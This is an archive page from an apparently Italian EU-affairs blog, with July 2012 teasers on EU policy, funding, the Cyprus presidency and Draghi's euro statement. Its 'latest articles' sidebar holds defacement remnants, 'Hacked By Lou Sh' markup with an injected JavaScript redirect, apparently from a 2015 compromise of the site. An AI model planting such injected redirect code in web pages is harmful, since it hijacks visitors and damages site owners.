EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Luglio 2012
it

E’ quanto è stato rilevato dall’Indagine Eurobarometro “European Survey on Language Competences”, uno studio della Commissione Europea sulle competenze linguistiche e sull’atteggiamento dei cittadini Ue nei confronti del multilinguismo e dell’apprendimento di lingue straniere.

Lingue In europa attualmente vengono parlate 23 lingue ufficiali. Oltre a quelle ci sono altre decine di lingue non ufficiali. I cittadini Europei sono diffusamente consapevoli dei vantaggi del multilinguismo: il 72% degli intervistati è d’accordo con la decisione di insegnare almeno due (...)

it

Washington DC ha ospitato, dal tre al nove giugno, la settima edizione del G8&G20 Youth Summits. Si tratta di eventi giovanili che si svolgono, ogni anno, parallelamente ai celebri incontri internazionali dei Leaders mondiali, riunendo centinaia di giovani e brillanti studenti provenienti da tutti i paesi del G20.

Dopo i primi incontri virtuali per la stesura dell’Agenda dei temi di discussione, i giovani Ministri si trovano a dibatterne in prima persona attorno al tavolo di negoziazione. Tutto questo porta, infine, alla stesura di un comunicato Finale, conosciuto col nome di Final Communiqué, di cui vi (...)

it

Semplificate notevolmente le procedure di ottenimento dei finanziamenti europei, l'obiettivo dell'Ue è di pianificare gli appalti in accordo con gli Stati membri. E i dirigenti comunitari godranno di maggiore libertà.

Le norme comunitarie riguardo la gestione finanziaria sono contenute nel regolamento finanziario. Le relative modalità di esecuzione e le basi giuridiche specifiche per settore disciplinano le transazioni che hanno per oggetto i fondi europei. Le sovvenzioni Per la nuova categoria di (...)

it

L’interesse della Commissione europea questa volta mira a porre definitivamente fine alla questione della tratta degli esseri umani. La strategia è stata adottata lo scorso 19 giugno e comprende 40 nuove misure che verranno adottate nei prossimi cinque anni e che saranno indirizzate ad affrontare uno dei problemi più gravi in Europa, quanto nel mondo. Ogni giorno cresce il numero degli uomini condannati ai lavori forzati o alla donazione obbligata di organi. A soffrirne maggiormente sono le donne, continuamente condannate agli abusi sessuali.

La tratta degli esseri umani: la realtà di oggi Traffico di esseri umani Allarmanti le percentuali emerse dalla recenti indagini condotte dai Paesi membri: nel 2010 il 76% delle donne erano vittime di sfruttamenti sessuali. Contrariamente a quanto (...)

it

“La situazione è tale che non possiamo permetterci di non sfruttare la più piccola possibilità per creare anche un solo posto di lavoro in più”. Crescita e occupazione, quindi, sono le priorità del viceministro per gli affari europei Andreas Mavroyiannis, che ha parlato all’indomani dell’incarico della Repubblica di Cipro alla presidenza UE, subentrando a quella danese. Ma il caso ha voluto che proprio in questi giorni l'agenzia internazionale di rating Fitch's, seguendo Standard & Poor's e Moody's nella riduzione del rating del credito, ha abbassato Cipro allo status di “spazzatura”, rendendo ancor più drammatica una situazione economica già disastrosa

Membro dell’Unione Europea dal maggio 2004 e dell’Eurozona dal gennaio 2008, Cipro (che conta poco più di 800.000 abitanti) è lo Stato più orientale del continente e le sue coste si trovano a 200 chilometri da quelle della Siria e del Libano. Dal 1 luglio l’isola ha assunto la presidenza UE, (...)

it

Dopo un estenuante vertice, i leader europei sono riusciti a giungere ad un accordo riguardante le misure da attuare per permettere una maggiore stabilizzazione finanziaria ed economica. Il provvedimento ha incontrato però numerose difficoltà e le polemiche non sono mancate.

In un recente vertice avvenuto a Bruxelles tra le giornate del 28 e 29 giugno scorso e conclusosi in tarda serata tra i Capi di Governo dei diversi Paesi europei, il Presidente del Consiglio italiano, Mario Monti, fiancheggiato del Primo Ministro iberico Rajoy, ha raggiunto un accordo con la (...)

it

"Tuffati in Europa!" è il motto di "SmartStudent", iniziativa del Parlamento europeo, che dà la possibilità di capire quali chance l'Unione Europea offre ai giovani studenti universitari italiani. Il portale permette di orientarsi nel mondo delle istituzioni europee, di comprendere il loro funzionamento e la loro storia, al fine di rendere i giovani direttamente partecipi di quella che oggi è divenuta l’entità politica sovranazionale più importante. Stage e tirocini presso le istituzioni europee non sono un miraggio: "SmartStudent" li rende possibili, fornendoci tutte le indicazioni necessarie per potervi partecipare.

Conoscere l’Unione Europea e la sua storia è importante ora più che mai. Il portale "SmartStudent", dedicato agli studenti universitari e ai neolaureati italiani, permette di comprendere quale sia il funzionamento degli organi dell’Unione, come agiscono e interagiscono con le istituzioni nazionali, (...)

it

Il premio è stato assegnato a Vitoria-Gasteiz, il capoluogo basco che ha avuto questo riconoscimento per quanto riguarda l'anno in corso. La Commissione europea ha istituito questo premio nel 2010, decidendo di dare merito alla città che si fosse mostrata più attiva nella ricerca di una sostenibilità ambientale con due anni di anticipo rispetto all'anno di riferimento. Negli anni il riconoscimento è andato a Stoccolma (prima in assoluto), Amburgo, la stessa Vitoria-Gasteiz (detentrice per il 2012) e Nantes (2013).

L’European Green Capital è un premio istituito anche (e soprattutto) per incoraggiare le città europee ad una maggiore ecosostenibilità e ad educarle in ambito ambientale, accantonato sempre con maggior frequenza in nome di iniziative spesso più dannose ma certamente più remunerative. Come detto in (...)

it

Il quadro trimestrale della situazione occupazionale e sociale Ue pubblicato dalla Commissione designa che il numero di famiglie italiane che non riesce a pagare il mutuo sulla casa è aumentato in maniera allarmante: una su quattro. Secondo la stima della Bri (Banca dei Regolamenti Internazionali), le spese per interessi e restituzioni del capitale dei mutui sono arrivate ai massimi degli ultimi trent’anni. Nel rapporto della Bri si sottolineano soprattutto i rischi a livello mondiale di un indebitamento ancora eccessivo, suggerendo alle banche di fare pulizia nei bilanci, facendo accordi con i mutuatari ed evitando così il pignoramento su vasta scala.

Da settembre 2008 allo stesso mese del 2011 in termini assoluti l’importo medio di ciascuna famiglia italiana si è attestato attorno ai 21.000 euro di debito. Su questa cifra i mutui pesano del 41,5% , mentre gli altri prestiti e il credito al consumo rispettivamente per il 20% e il 13,6%. (...)

it

Le nuove norme, che regolano la concessione di finanziamenti europei, garantiscono più trasparenza e controllo rispetto al passato.

Trasparenza L’iter di attribuzione dei fondi comunitari prevede che entro il 30 giugno di ogni anno i dipartimenti della Commissione europea pubblichino online gli elenchi delle sovvenzioni assegnate nell’anno precedente, mentre borse di studio sono destinate a singoli individui. La (...)

it

L’allargamento dell’Unione Europea sta coinvolgendo sempre più Paesi dell’Est e dell’area balcanica. In ordine cronologico l’ultimo candidato a diventare in un futuro non troppo lontano membro della Comunità internazionale è il Montenegro. Il piccolo Stato deve però allinearsi all’insieme di principi e norme presenti in Europa da tempo.

Finalmente ci siamo. Dopo anni di intese, accordi e sforzi, il 29 giugno scorso, sono iniziati i negoziati per l’adesione ufficiale all’Unione Europea del Montenegro. Il piccolo Paese balcanico, che conta poco meno di settecento mila abitanti, ha appreso la notizia con estrema soddisfazione, (...)

it

Don Biagio Conte è un personaggio molto noto, soprattutto nel Sud Italia, tanto da essere definito da alcuni "il novello San Francesco". Tale nomina esplica più di ogni altra parola l'importanza che quest'uomo ha rispetto ai disagiati, ai rassegnati e a chiunque abbia bisogno di aiuto quando le cose sembrano aver preso la via del non ritorno. L'Europa ha dimostrato un certo interesse verso questa figura che tanto bene sta facendo aiutando i più sfortunati a scapito della sua stessa esistenza, che lo vede impegnato in attività di sostegno verso gli altri da molti anni.

"Il conferimento a Biagio Conte del premio come Cittadino europeo 2012 da parte del Parlamento Europeo, è il riconoscimento ad una intera vita dedicata agli altri, alla promozione della cultura della solidarietà, all’interculturalità. Al Fratello Biagio i migliori auguri perché possa proseguire il (...)

it

Il Parlamento europeo, riunitosi a Strasburgo lo scorso 5 luglio, ha approvato - con 579 voti a favore, 32 contrari e 9 astensioni - uno stanziamento di ben 230 milioni di euro in garanzie a sostegno dell’emissione privata di obbligazioni di progetto, comunemente dette “project bond”, per lavori nei settori dell’energia, del trasporto e dell’informazione.

Chi ha sempre sostenuto i project bond, da oggi - o meglio dal 5 luglio scorso - può finalmente iniziare a tirare un sospiro di sollievo. La decisione del Parlamento europeo di approvare uno stanziamento di 230 milioni di euro a favore delle infrastrutture, infatti, rappresenta un ottimo test in (...)

it

PMI, ONG, studenti e ricercatori tra i beneficiari delle sovvenzioni stanziate da Bruxelles. Molte informazioni riguardanti l'iter compreso tra la presentazione del progetto e l'ottenimento dei finanziamenti sono disponibili su internet.

Piccole e medie imprese Le piccole e medie imprese hanno la possibilità di ottenere i fondi europei sotto forma di sovvenzioni, prestiti e garanzie, ma possono anche godere di misure assistenziali non finanziarie finalizzate al sostegno delle imprese. Portale europeo per le PMI Offre una (...)

it

I giovani italiani interessati a proseguire i propri studi in un altro Paese hanno la possibilità di ottenere una delle dieci borse di studio messe a disposizione dal Ministero degli Esteri e dal Ministero degli Affari Esteri messicano. Le borse di studio riguardano lauree brevi e specialistiche, come dottorati o ricerche. Chiunque voglia usufruire di tale opportunità può completare la domanda di partecipazione e ottenere maggiori informazioni al link qui riportato: http://amexcid.gob.mx/index.php/bec...

Informazioni generali Il Ministro degli Esteri e il Ministro degli Affari Esteri messicano mettono a disposizione dei giovani italiani dieci borse di studio che ricopriranno l’intero periodo di studio. Il Ministero degli Esteri e il Ministero degli Affari Esteri messicano garantiscono a (...)

it

I Biocidi, definiti come “principi attivi, presentati nella forma in cui sono consegnati all'utilizzatore, destinati a distruggere, eliminare, rendere innocui o impedire l'azione o esercitare altro effetto di controllo su qualsiasi organismo nocivo con mezzi chimici o biologici”, sono usati in disinfettanti domestici e ospedalieri, veleno per topi, insettifughi, vernici e spray antimuffa, pastiglie per la depurazione dell'acqua e molti altri prodotti. Il nuovo regolamento aumenterà la sicurezza di questi prodotti chimici e semplificherà la loro autorizzazione sul mercato Ue, migliorandone la libera circolazione.

I biocidi sono dappertutto: disinfettanti, insetticidi, antiacari... Il loro uso continuato ed esagerato mette tuttavia a rischio la nostra salute e quella dell’ambiente. Nel 1998 l’Ue aveva disposto delle norme sulla messa a disposizione sul mercato dei Biocidi (con la direttiva (...)

it

Nuovo e oneroso strumento anti-crisi adottato dall'Unione europea. L'Italia è messa ancora una volta alla prova: questa volta dovrà impegnarsi per ottenere maggiori fondi rispetto al passato. Intanto, il Commissario europeo Geoghegan-Quinn lancia l'allarme: "il finanziamento della ricerca non è sempre assegnato in modo concorrenziale".

Lo scorso 9 luglio la Commissione europea ha presentato i bandi di ricerca per l’innovazione del VII Programma Quadro dell’anno 2013, gli ultimi della programmazione finanziaria 2007-2013. L’investimento sostenuto da Bruxelles è pari a 8,1 miliardi di euro ed intende sovvenzionare progetti (...)

it

La revisione della prima norma non è stata sufficiente per porre definitivamente fine alla questione dell’unbundling. Ora la Commissione europea ha deciso di aprire una procedura di infrazione contro l’Italia e, in un certo senso, si può parlare di infrazione annunciata. Infatti, già quando la stessa Commissione aveva tentato di apportare delle correzioni alle norme in materia di unbundling, dure erano state le critiche accompagnate dall’annuncio di eventuali sanzioni che ora, invece, verranno realmente attuate.

Una infrazione contro l’Italia Neelie Kroes Responsabile dell’Agenda Digitale, Neelie Kroes ha attribuito la responsabilità al Decreto Semplificazioni, che ha modificato le modalità di accesso alla rete fissa di Telecom Italia La Commissione europea ha avviato una procedura di infrazione (...)

it

Giovedì 26 luglio 2012, dalle ore 09:30 alle 14:00, il Consiglio europeo incontrerà nella sua sede di Bruxelles i blogger di tutta Europa. L’evento, organizzato dalla Presidenza di Cipro, in carica dal 1 luglio al 31 dicembre, sarà un modo per avvicinare la blogosfera alla Presidenza e generare al contempo interesse e partecipazione al dibattito politico europeo.

I blog come rivoluzione democratica di internet Che sia a torto o a ragione, i blog sono ormai ritenuti la vera “killer application” del web. Da quando infatti sono comparsi i primi Cms – Content management system – che hanno nell’utilizzo di una piattaforma di gestione dei contenuti semplificata (...)

it

L’European Youth Forum (YFJ) è un’organizzazione internazionale che riunisce i Consigli della gioventù nazionali e le organizzazioni internazionali della gioventù provenienti da tutta Europa e si occupa della promozione degli interessi dei giovani. Il Forum e l’Alleanza dell’Anno Europeo del volontariato 2011 (EYV), assieme ad altri partner e stakeholder, hanno permesso la realizzazione di un documento molto importante, la Carta Europea dei Diritti e delle Responsabilità del Volontario. La Carta, articolata in diverse sezioni, definisce il significato dell’essere volontario, fornitore di volontariato e dell’attività di volontariato stessa.

Lo status di volontario richiede un suo riconoscimento giuridico; la Carta definisce i diritti del volontario e tutte le norme ambientali e legali che devono essere rispettate nelle attività di volontariato, nonché esprime con chiarezza i doveri e i diritti dei “volounteering providers”, i (...)

it

La Commissione europea ha dato il via a due nuove consultazioni pubbliche sul tema della Net Neutrality. In modo particolare, l’Ue intende verificare le condizioni del traffico in Internet portando alla luce eventuali ostacoli all’accesso alla Rete. I sondaggi si rivolgono ad enti pubblici e privati, tra cui fornitori di servizi e contenuti Internet, produttori, consumatori e autorità pubbliche.

La prima consultazione: Net Neutrality Due consultazioni pubbliche La Commissione europea lancia due consultazioni al fine di verificare le condizioni della rete e ottenere risposte utili alla nuova strategia sulla sicurezza

it

Per ora l'applicazione si "limita" ai trasporti sopra citati, ma nel 2013 verrà estesa: è previsto infatti il suo utilizzo sugli autobus e sui trasporti marittimi. Lo scopo principale è quello di aiutare i viaggiatori a risolvere eventuali problemi che potrebbero venire a crearsi durante gli spostamenti. Questo purtroppo è un inconveniente abbastanza ricorrente, dovuto soprattutto al sovraffollamento che si crea in luoghi spesso non predisposti ad ospitare così tante persone.

Quali diritti ho in casi come questo? A chi posso rivolgermi? Esiste una soluzione per questa spiacevole situazione? La nuova applicazione per smartphone, voluta fortemente dalla Commissione europea, rappresenta un’interessante innovazione, utile soprattutto alle persone che per motivi (...)

it

In occasione del ventennale del programma LIFE, la Commissione europea ha stanziato 268,4 milioni di euro da destinare a ben 202 progetti, scrupolosamente selezionati tra le migliaia di richieste presentate dai 27 Stati membri e che comporteranno interventi mirati nei settori della tutela della natura, della politica ambientale, dell’informazione e della comunicazione in materia di questioni ambientali.

Del programma LIFE ne abbiamo già parlato qui, sottolineando come esso abbia rappresentato - e tuttora rappresenti - uno tra “i più importanti finanziamenti da parte dell’Unione europea a favore dell’ambiente”. È per questo che all’iniziativa aveva fatto seguito il programma LIFE+, riferito al periodo (...)

it

E’ stato un incontro imprevisto, un “fuori programma”. I due si sono incontrati presso l’ambasciata italiana a Londra, in visita in occasione dei giochi olimpici. Lo stesso Draghi è intervenuto nel corso della “Global Investment Conference” organizzata dal governo britannico a Londra. “All'interno del proprio mandato, la Bce è pronta a fare qualunque cosa per preservare l'euro, e credetemi, questo basterà”. Le parole del presidente della Banca Centrale Europea risultano ottimiste e speranzose. “Negli ultimi sei mesi l'area euro ha mostrato progressi straordinari. L'Eurozona - ha continuato il banchiere - è “molto più solida di quanto si pensi”. Per Draghi “non è possibile immaginare la possibilità che un paese esca dall'Eurozona”. A detta di Draghi i paesi dell’area euro hanno fatto notevoli progressi e l’eurozona ha il potere di sconfiggere la speculazione sui mercati. Intanto il Fondo Monetario Internazionale accoglie con favore le dichiarazioni di Draghi, “che sono la conferma dell’impegno della Bce a fare tutto quanto è necessario”.

La Germania e la Francia sono determinate a fare tutto il possibile per proteggere l’eurozona. Lo hanno dichiarato la cancelliera tedesca Angela Merkel e il presidente francese François Hollande, in una nota congiunta diffusa dal governo tedesco. Un sostegno politico che rafforza ulteriormente (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France